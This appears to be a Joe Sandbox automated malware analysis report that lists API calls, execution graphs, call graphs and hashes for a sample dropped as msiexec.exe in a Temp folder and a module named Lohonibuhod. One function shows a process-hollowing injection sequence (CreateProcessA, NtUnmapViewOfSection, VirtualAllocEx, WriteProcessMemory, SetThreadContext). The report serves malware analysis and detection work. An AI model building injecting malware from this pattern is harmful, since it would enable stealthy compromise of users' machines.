            • Opcode ID: fafc01fa0b5d2362d242574a082482175bf6a202212f898f1eafb4efd6dd8d4c
            • Instruction ID: 266b505f4b4a70e0031bd9b61304a7f29979de1156be46298b6644775383f0d6
            • Opcode Fuzzy Hash: fafc01fa0b5d2362d242574a082482175bf6a202212f898f1eafb4efd6dd8d4c
            • Instruction Fuzzy Hash: 70F0B4B2B04201AFDB00EBA19E49AAF36589B40348F14443BB142F50C2D6BC4941AB6D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FreeLibrary.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000,00403498,004032EB,00000000), ref: 004034DA
            • GlobalFree.KERNEL32(?), ref: 004034E1
            Strings
            • "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 004034D2
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Free$GlobalLibrary
            • String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
            • API String ID: 1100898210-1098974352
            • Opcode ID: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
            • Instruction ID: a7ab284cabc648ba81e11ba063b903b3b671d5f7e61a69f5101281db245b6d62
            • Opcode Fuzzy Hash: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
            • Instruction Fuzzy Hash: E1E08C329110209BD6221F05AE0575A7B6D6B44B32F02802AE9407B2A087746C424BDD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp\MSI,00402C8E,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 0040554C
            • CharPrevA.USER32(80000000,00000000), ref: 0040555A
            Strings
            • C:\Users\user\AppData\Local\Temp\MSI, xrefs: 00405546
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\MSI
            • API String ID: 2709904686-654057852
            • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
            • Instruction ID: fca702df0190f5d4796b13fce4c8f5ccfdab60c3fa8ed772e71c257c4247ae30
            • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
            • Instruction Fuzzy Hash: 39D0A772508EB07EE70366149C00B9F7A88CF13340F094462E040A61D4C27C4D418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405678
            • CharNextA.USER32(00000000), ref: 00405686
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
            • Instruction ID: fee4d645b7b415a6dc1afaac75e8b1817c7eae67fc86a6e8a33b60f3285d70db
            • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
            • Instruction Fuzzy Hash: 05F0A736309D519AC2125B295C04A6F6A98EF91314B58097AF444F2140E33A9C119BBF
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:10.4%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0%
            Total number of Nodes:316
            Total number of Limit Nodes:13
            execution_graph 1607 10001000 GetModuleHandleA 1619 10001301 GetProcAddress 1607->1619 1610 10001093 RtlZeroMemory 1611 100010bf LoadLibraryA 1610->1611 1612 100010e9 CreateProcessA NtUnmapViewOfSection 1611->1612 1614 10001150 VirtualAllocEx WriteProcessMemory 1612->1614 1616 10001202 SetThreadContext 1614->1616 1618 100012f6 1616->1618 1620 10001337 GetProcAddress LoadLibraryA 1619->1620 1621 1000105a GetCommandLineA PathGetArgsA 1620->1621 1621->1610 1924 401040 1929 401050 ??0_Winit@std@@QAE 1924->1929 1930 10003940 1931 100039d2 1930->1931 1933 1000395e 1930->1933 1933->1931 1934 10003848 RtlUnwind 1933->1934 1935 10003860 1934->1935 1935->1933 1936 401000 1941 401010 ??0Init@ios_base@std@@QAE 1936->1941 1622 221000 div VirtualAlloc CreateFileW 1623 221057 VirtualQuery 1622->1623 1624 22107a calloc ReadFile CloseHandle 1622->1624 1942 21000 1946 21068 1942->1946 1943 210e5 toupper toupper 1947 21106 __allrem 1943->1947 1944 210a8 toupper toupper 1944->1943 1944->1946 1945 21171 wsprintfA 1946->1943 1946->1944 1946->1947 1947->1945 1948 31000 toupper 1949 31021 strchr 1948->1949 1951 310a3 1949->1951 1952 100035c4 1953 100035d3 1952->1953 1954 100035d8 MultiByteToWideChar 1953->1954 1955 1000363e 1953->1955 1954->1955 1956 100035f1 LCMapStringW 1954->1956 1956->1955 1957 1000360c 1956->1957 1958 10003612 1957->1958 1960 10003652 1957->1960 1958->1955 1959 10003620 LCMapStringW 1958->1959 1959->1955 1960->1955 1961 1000368a LCMapStringW 1960->1961 1961->1955 1962 100036a2 WideCharToMultiByte 1961->1962 1962->1955 1625 100026a5 1628 100026b7 1625->1628 1629 100026b4 1628->1629 1631 100026be 1628->1631 1631->1629 1632 100026e3 1631->1632 1633 100026f0 1632->1633 1637 100026f6 1632->1637 1639 100021f0 1633->1639 1635 10002702 HeapAlloc 1638 10002717 1635->1638 1636 100026ff 1636->1635 1637->1635 1637->1636 1637->1638 1638->1631 1643 10002222 1639->1643 1640 100022c1 1642 100022d0 1640->1642 1652 100025aa 1640->1652 1642->1637 1643->1640 1643->1642 1645 100024f9 1643->1645 1646 1000253c RtlAllocateHeap 1645->1646 1647 1000250c HeapReAlloc 1645->1647 1649 1000258c 1646->1649 1650 10002562 VirtualAlloc 1646->1650 1648 1000252b 1647->1648 1647->1649 1648->1646 1649->1640 1650->1649 1651 1000257c HeapFree 1650->1651 1651->1649 1653 100025bc VirtualAlloc 1652->1653 1655 10002605 1653->1655 1655->1642 1964 10001546 1965 10001566 3 API calls 1964->1965 1966 10001553 1965->1966 1656 10001449 1658 10001465 1656->1658 1660 1000145c 1656->1660 1658->1660 1663 1000148d 1658->1663 1664 10001391 1658->1664 1659 100014ad 1662 10001391 63 API calls 1659->1662 1659->1663 1660->1659 1661 10001391 63 API calls 1660->1661 1660->1663 1661->1659 1662->1663 1665 10001398 GetVersion 1664->1665 1669 10001416 1664->1669 1684 10001619 HeapCreate 1665->1684 1667 10001410 1667->1660 1668 100013aa 1668->1667 1671 100013b3 GetCommandLineA 1668->1671 1669->1667 1670 10001439 1669->1670 1759 10001557 1669->1759 1691 10001875 1670->1691 1700 10001b9e 1671->1700 1679 100013fb 1737 10001951 1679->1737 1681 10001400 1746 10001898 1681->1746 1683 10001405 1683->1667 1685 10001639 1684->1685 1686 1000164e 1684->1686 1762 10001e5c HeapAlloc 1685->1762 1686->1668 1689 10001651 1689->1668 1690 10001642 HeapDestroy 1690->1686 1692 1000187b 1691->1692 1694 1000143e 1692->1694 1764 10002719 1692->1764 1695 10001655 1694->1695 1696 10001667 1695->1696 1697 100016ab HeapFree HeapDestroy 1695->1697 1698 10001677 VirtualFree VirtualFree HeapFree 1696->1698 1697->1667 1698->1698 1699 100016a9 1698->1699 1699->1697 1701 10001bb9 GetEnvironmentStringsW 1700->1701 1702 10001bec 1700->1702 1703 10001bc1 1701->1703 1704 10001bcd GetEnvironmentStrings 1701->1704 1702->1703 1705 10001bdd 1702->1705 1707 10001c05 WideCharToMultiByte 1703->1707 1708 10001bf9 GetEnvironmentStringsW 1703->1708 1704->1705 1706 100013f1 1704->1706 1705->1706 1709 10001c8b 1705->1709 1710 10001c7f GetEnvironmentStrings 1705->1710 1723 100016ca 1706->1723 1712 10001c39 1707->1712 1713 10001c6b FreeEnvironmentStringsW 1707->1713 1708->1706 1708->1707 1714 100026a5 6 API calls 1709->1714 1710->1706 1710->1709 1777 100026a5 1712->1777 1713->1706 1722 10001ca6 1714->1722 1717 10001c48 WideCharToMultiByte 1719 10001c62 1717->1719 1720 10001c59 1717->1720 1718 10001cbc FreeEnvironmentStringsA 1718->1706 1719->1713 1721 10002719 4 API calls 1720->1721 1721->1719 1722->1718 1724 100026a5 6 API calls 1723->1724 1725 100016db 1724->1725 1726 100016e9 GetStartupInfoA 1725->1726 1780 100014e6 1725->1780 1729 100017fa 1726->1729 1736 10001735 1726->1736 1730 10001821 GetStdHandle 1729->1730 1731 10001861 SetHandleCount 1729->1731 1730->1729 1732 1000182f GetFileType 1730->1732 1731->1679 1732->1729 1733 100026a5 6 API calls 1733->1736 1734 100017a6 1734->1729 1735 100017c8 GetFileType 1734->1735 1735->1734 1736->1729 1736->1733 1736->1734 1738 10001963 1737->1738 1739 10001968 GetModuleFileNameA 1737->1739 1806 10002c7f 1738->1806 1741 1000198b 1739->1741 1742 100026a5 6 API calls 1741->1742 1743 100019ac 1742->1743 1744 100019bc 1743->1744 1745 100014e6 7 API calls 1743->1745 1744->1681 1745->1744 1747 100018a5 1746->1747 1750 100018aa 1746->1750 1748 10002c7f 19 API calls 1747->1748 1748->1750 1749 100026a5 6 API calls 1751 100018d7 1749->1751 1750->1749 1752 100014e6 7 API calls 1751->1752 1758 100018eb 1751->1758 1752->1758 1753 1000192e 1754 10002719 4 API calls 1753->1754 1755 1000193a 1754->1755 1755->1683 1756 100026a5 6 API calls 1756->1758 1757 100014e6 7 API calls 1757->1758 1758->1753 1758->1756 1758->1757 1860 10001566 1759->1860 1763 1000163e 1762->1763 1763->1689 1763->1690 1765 10002722 1764->1765 1766 10002746 1764->1766 1767 10002738 HeapFree 1765->1767 1768 1000272e 1765->1768 1766->1692 1767->1766 1771 10001ec5 1768->1771 1770 10002734 1770->1692 1773 10001f0c 1771->1773 1772 100020fe VirtualFree 1774 10002162 1772->1774 1773->1772 1776 100021b8 1773->1776 1775 10002171 VirtualFree HeapFree 1774->1775 1774->1776 1775->1776 1776->1770 1778 100026b7 6 API calls 1777->1778 1779 10001c3f 1778->1779 1779->1713 1779->1717 1781 100014f0 1780->1781 1782 10001502 1781->1782 1786 10001cd0 1781->1786 1792 10001d09 1782->1792 1787 10001cda 1786->1787 1788 10001d07 1787->1788 1789 10001d09 7 API calls 1787->1789 1788->1782 1790 10001cf1 1789->1790 1791 10001d09 7 API calls 1790->1791 1791->1788 1795 10001d1c 1792->1795 1793 1000150b 1793->1726 1794 10001e33 1797 10001e46 GetStdHandle WriteFile 1794->1797 1795->1793 1795->1794 1796 10001d5c 1795->1796 1796->1793 1798 10001d68 GetModuleFileNameA 1796->1798 1797->1793 1799 10001d80 1798->1799 1801 10002fd5 1799->1801 1802 10002fe2 LoadLibraryA 1801->1802 1804 10003024 1801->1804 1803 10002ff3 GetProcAddress 1802->1803 1802->1804 1803->1804 1805 1000300a GetProcAddress GetProcAddress 1803->1805 1804->1793 1805->1804 1807 10002c88 1806->1807 1808 10002c8f 1806->1808 1810 100028bb 1807->1810 1808->1739 1817 10002a54 1810->1817 1814 100028fe GetCPInfo 1816 10002912 1814->1816 1815 10002a48 1815->1808 1816->1815 1822 10002afa GetCPInfo 1816->1822 1818 10002a74 1817->1818 1819 10002a64 GetOEMCP 1817->1819 1820 100028cc 1818->1820 1821 10002a79 GetACP 1818->1821 1819->1818 1820->1814 1820->1815 1820->1816 1821->1820 1823 10002be5 1822->1823 1826 10002b1d 1822->1826 1823->1815 1830 100036ff 1826->1830 1829 100034b0 9 API calls 1829->1823 1831 10003730 GetStringTypeW 1830->1831 1832 10003748 1830->1832 1831->1832 1835 1000374c GetStringTypeA 1831->1835 1833 10003773 GetStringTypeA 1832->1833 1834 10003797 1832->1834 1836 10002b99 1833->1836 1834->1836 1838 100037ad MultiByteToWideChar 1834->1838 1835->1832 1835->1836 1842 100034b0 1836->1842 1838->1836 1839 100037d1 1838->1839 1839->1836 1840 1000380b MultiByteToWideChar 1839->1840 1840->1836 1841 10003824 GetStringTypeW 1840->1841 1841->1836 1843 100034e0 LCMapStringW 1842->1843 1844 100034fc 1842->1844 1843->1844 1845 10003504 LCMapStringA 1843->1845 1846 10003562 1844->1846 1847 10003545 LCMapStringA 1844->1847 1845->1844 1848 10002bbd 1845->1848 1846->1848 1849 10003578 MultiByteToWideChar 1846->1849 1847->1848 1848->1829 1849->1848 1850 100035a2 1849->1850 1850->1848 1851 100035d8 MultiByteToWideChar 1850->1851 1851->1848 1852 100035f1 LCMapStringW 1851->1852 1852->1848 1853 1000360c 1852->1853 1854 10003612 1853->1854 1856 10003652 1853->1856 1854->1848 1855 10003620 LCMapStringW 1854->1855 1855->1848 1856->1848 1857 1000368a LCMapStringW 1856->1857 1857->1848 1858 100036a2 WideCharToMultiByte 1857->1858 1858->1848 1861 10001572 GetCurrentProcess TerminateProcess 1860->1861 1862 10001583 1860->1862 1861->1862 1863 10001562 1862->1863 1864 100015ed ExitProcess 1862->1864 1863->1670 1865 40168c __set_app_type __p__fmode __p__commode 1866 4016fb 1865->1866 1867 401703 __setusermatherr 1866->1867 1868 40170f 1866->1868 1867->1868 1877 401802 _controlfp 1868->1877 1870 401714 _initterm __getmainargs _initterm 1871 401768 GetStartupInfoA 1870->1871 1873 40179c GetModuleHandleA 1871->1873 1878 401250 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 1873->1878 1877->1870 1879 401291 GetSidLengthRequired CreateConsoleScreenBuffer 1878->1879 1881 401368 sexuhus ??2@YAPAXI 1879->1881 1903 401080 1881->1903 1884 401395 1908 401628 free 1884->1908 1886 4013ee Nuhazelaxim 1887 401604 exit 1886->1887 1888 401404 isupper 1886->1888 1889 40142e 1888->1889 1890 401440 bibezarebowu ??2@YAPAXI 1889->1890 1891 40148c 1890->1891 1893 4014b5 1891->1893 1909 4011c0 1891->1909 1915 401628 free 1893->1915 1895 4014bb zejutuhodomo ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 1896 40152b _strdup 1895->1896 1897 40150c 1895->1897 1898 401556 1896->1898 1897->1896 1899 4015a7 1898->1899 1916 401628 free 1898->1916 1900 4015d7 exit _XcptFilter 1899->1900 1917 401628 free 1899->1917 1904 4010a5 1903->1904 1905 401140 _ftol 1904->1905 1906 401155 _ftol 1904->1906 1905->1884 1906->1884 1908->1886 1910 4011e0 1909->1910 1911 4011e7 1910->1911 1912 40121e wsprintfA 1910->1912 1913 401240 1911->1913 1914 4011fe wsprintfA 1911->1914 1912->1913 1913->1891 1914->1891 1915->1895 1916->1899 1917->1900 1967 2134f 1968 2136b 1967->1968 1970 21362 1967->1970 1968->1970 1972 21393 1968->1972 1975 212a4 1968->1975 1971 213b3 1970->1971 1970->1972 1973 212a4 3 API calls 1970->1973 1971->1972 1974 212a4 3 API calls 1971->1974 1973->1971 1974->1972 1976 212ac 1975->1976 1977 212e2 1976->1977 1978 212cd malloc 1976->1978 1980 2130c 1976->1980 1977->1970 1978->1977 1979 212e6 _initterm 1978->1979 1979->1977 1980->1977 1981 21339 free 1980->1981 1981->1977 2013 401070 ??1_Winit@std@@QAE 2014 401030 ??1Init@ios_base@std@@QAE 2015 10003938 2018 10003940 2015->2018 2016 100039d2 2017 10003848 RtlUnwind 2017->2018 2018->2016 2018->2017 2019 10003678 2020 10003686 2019->2020 2021 1000368a LCMapStringW 2020->2021 2022 1000363e 2020->2022 2021->2022 2023 100036a2 WideCharToMultiByte 2021->2023 2023->2022 2025 100037fc 2026 10003803 2025->2026 2027 10003834 2026->2027 2028 1000380b MultiByteToWideChar 2026->2028 2028->2027 2029 10003824 GetStringTypeW 2028->2029 2029->2027 1997 4017de _exit 1918 40165f 1921 401633 1918->1921 1920 401668 1922 401648 __dllonexit 1921->1922 1923 40163c _onexit 1921->1923 1922->1920 1923->1920

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_10001000 2 Function_10001301 0->2 1 Function_00401040 8 Function_00401050 1->8 15 Function_0040165F 1->15 3 Function_00021000 55 Function_00021270 3->55 80 Function_000211B0 3->80 4 Function_00031000 5 Function_10001D09 23 Function_10002840 5->23 31 Function_10002750 5->31 45 Function_10003060 5->45 46 Function_10002760 5->46 97 Function_10002FD5 5->97 6 Function_10002D10 7 Function_00401250 52 Function_00401628 7->52 62 Function_004011C0 7->62 87 Function_00401180 7->87 88 Function_00401080 7->88 9 Function_10003915 10 Function_10001619 42 Function_10001E5C 10->42 11 Function_10002719 69 Function_10001E9A 11->69 90 Function_10001EC5 11->90 12 Function_10001519 114 Function_100015FF 12->114 13 Function_1000391E 14 Function_1000331E 56 Function_00401633 15->56 16 Function_10003A20 17 Function_10003220 18 Function_00221000 19 Function_00401070 20 Function_10003938 20->13 27 Function_10003848 20->27 63 Function_1000388A 20->63 21 Function_10002D3C 22 Function_10003940 22->13 22->27 22->63 24 Function_00401000 24->15 33 Function_00401010 24->33 25 Function_00401802 26 Function_10001546 50 Function_10001566 26->50 28 Function_10001449 64 Function_1000138B 28->64 65 Function_10001391 28->65 29 Function_1000334C 30 Function_0002134F 70 Function_0002119F 30->70 77 Function_000212A4 30->77 32 Function_10003A50 34 Function_10001951 61 Function_10002C7F 34->61 76 Function_100026A5 34->76 102 Function_100014E6 34->102 103 Function_100019EA 34->103 35 Function_10002A54 36 Function_00401814 37 Function_10001655 38 Function_10001557 38->50 39 Function_10002757 40 Function_00401817 41 Function_0022117B 99 Function_002210C0 41->99 106 Function_002210D0 41->106 43 Function_10002E5E 44 Function_10003860 47 Function_10003160 48 Function_10002D60 49 Function_00031166 81 Function_000310B5 49->81 84 Function_000310BB 49->84 50->114 51 Function_10003868 53 Function_10003369 54 Function_00401030 57 Function_10003674 58 Function_10001875 58->11 59 Function_10003378 60 Function_10003678 85 Function_100028BB 61->85 105 Function_004011B0 62->105 63->13 65->10 65->12 65->34 65->37 65->38 65->58 67 Function_10001898 65->67 71 Function_10001B9E 65->71 92 Function_100016CA 65->92 66 Function_10003495 67->11 67->23 67->31 67->61 67->76 67->102 68 Function_10002E98 71->11 74 Function_10002CA0 71->74 71->76 72 Function_10002A9E 73 Function_004017DE 75 Function_100033A0 82 Function_100026B7 76->82 78 Function_100025AA 79 Function_100034B0 79->16 96 Function_100036D4 79->96 82->66 100 Function_100026E3 82->100 83 Function_10002EB8 85->35 85->72 95 Function_10002AD1 85->95 110 Function_10002AFA 85->110 86 Function_100035C0 89 Function_100035C4 89->16 90->47 91 Function_100031C7 92->76 92->102 93 Function_0040168C 93->7 93->25 93->40 94 Function_10001CD0 94->5 98 Function_10002EE0 104 Function_100021F0 100->104 101 Function_100031E5 102->5 102->94 104->78 109 Function_100024F9 104->109 107 Function_100038F2 108 Function_100037F8 110->79 115 Function_100036FF 110->115 111 Function_100031FC 112 Function_100037FC 113 Function_100039FD 113->63 115->16 115->32

            Control-flow Graph

            APIs
            • GetModuleHandleA.KERNEL32(?), ref: 10001046
              • Part of subcall function 10001301: GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,1000105A,00000000,100051F0), ref: 1000131C
              • Part of subcall function 10001301: GetProcAddress.KERNEL32(?,?), ref: 10001349
              • Part of subcall function 10001301: LoadLibraryA.KERNEL32(?,?), ref: 10001362
            • GetCommandLineA.KERNEL32(00000000,100051F0), ref: 1000105A
            • PathGetArgsA.SHLWAPI(00000000), ref: 10001061
            • RtlZeroMemory.NTDLL(10005210,00000044), ref: 100010A4
            • LoadLibraryA.KERNEL32(00302682), ref: 100010DB
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,10005210,10005534), ref: 10001125
            • NtUnmapViewOfSection.NTDLL(00000068,?), ref: 1000113B
            • VirtualAllocEx.KERNEL32(00000068,?,?,00003000,00000040), ref: 100011C9
            • WriteProcessMemory.KERNEL32(00000068,?,?,?,00000000), ref: 100011ED
            • SetThreadContext.KERNEL32(00000064,10005274), ref: 100012E0
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: AddressLibraryLoadMemoryProcProcess$AllocArgsCommandContextCreateHandleLineModulePathSectionThreadUnmapViewVirtualWriteZero
            • String ID: ($F)0
            • API String ID: 1080973309-239859076
            • Opcode ID: a38787383578460d9f80fd7ad5fe535ca0efe5eb2b17e4e9531d122c72930174
            • Instruction ID: 76c8b29cae2120b4dc249c8130facd7c94d54277ada5e0b6c53328871c768ed4
            • Opcode Fuzzy Hash: a38787383578460d9f80fd7ad5fe535ca0efe5eb2b17e4e9531d122c72930174
            • Instruction Fuzzy Hash: A0A1AF742052259FE704CF68CCD8E667BA9FF4E38A78541A8E5068B37AC732E811CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
            • Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: 1aab29c4961d9801456f6f2daad18b18a4c27e3fb86cf4f94d382372d13c427c
            • Instruction ID: 52233c6cf25bfc6cc73b3f2363ea5102594a70d695ffa1cbd7b767b4891c9421
            • Opcode Fuzzy Hash: 1aab29c4961d9801456f6f2daad18b18a4c27e3fb86cf4f94d382372d13c427c
            • Instruction Fuzzy Hash: 92417F75800348AFDB209FA5DA49A6A7BBCEB09711F20413FF551B72E1D7784941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • div.MSVCRT ref: 0022100C
            • VirtualAlloc.KERNELBASE(00000000,000000E8,00001000,00000004), ref: 0022102D
            • CreateFileW.KERNELBASE(00223010,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0022104A
            • VirtualQuery.KERNEL32(00223048,?,0000001C), ref: 00221063
            • calloc.MSVCRT ref: 00221081
            • ReadFile.KERNELBASE(00000000,00000000,00006000,00223038,00000000), ref: 0022109D
            • CloseHandle.KERNELBASE(00000000), ref: 002210A4
            Memory Dump Source
            • Source File: 00000006.00000002.364608956.0000000000221000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00220000, based on PE: true
            • Associated: 00000006.00000002.364606591.0000000000220000.00000002.00000001.01000000.0000000F.sdmpDownload File
            • Associated: 00000006.00000002.364611624.0000000000222000.00000002.00000001.01000000.0000000F.sdmpDownload File
            • Associated: 00000006.00000002.364614006.0000000000224000.00000002.00000001.01000000.0000000F.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_220000_Lohonibuhod.jbxd
            Similarity
            • API ID: FileVirtual$AllocCloseCreateHandleQueryReadcalloc
            • String ID:
            • API String ID: 2764131044-0
            • Opcode ID: 7888f77b33028656a53fa628e7dfbca5873844f315b6fe46792913baa491c990
            • Instruction ID: 5a1c7f4c1f207d1fde1815481f4d799f92e140fe37dff6bf8a490bb5af814fc0
            • Opcode Fuzzy Hash: 7888f77b33028656a53fa628e7dfbca5873844f315b6fe46792913baa491c990
            • Instruction Fuzzy Hash: FA118070684310FBF234DB94BC4EF9A3AA0AB58B11F405110F749AA1E0D3B9575ACB79
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • VirtualFree.KERNELBASE(00290584,00100000,00004000,?,?,?,?,10001443,10001489,?,?,?), ref: 10001683
            • VirtualFree.KERNELBASE(00290584,00000000,00008000,?,?,10001443,10001489,?,?,?), ref: 1000168E
            • HeapFree.KERNEL32(00000000,?), ref: 1000169B
            • HeapFree.KERNEL32(00000000,?,?), ref: 100016B9
            • HeapDestroy.KERNELBASE(?,?,10001443,10001489,?,?,?), ref: 100016C1
            Memory Dump Source
            • Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
            • Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd
            Similarity
            • API ID: Free$Heap$Virtual$Destroy
            • String ID:
            • API String ID: 782257640-0
            • Opcode ID: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
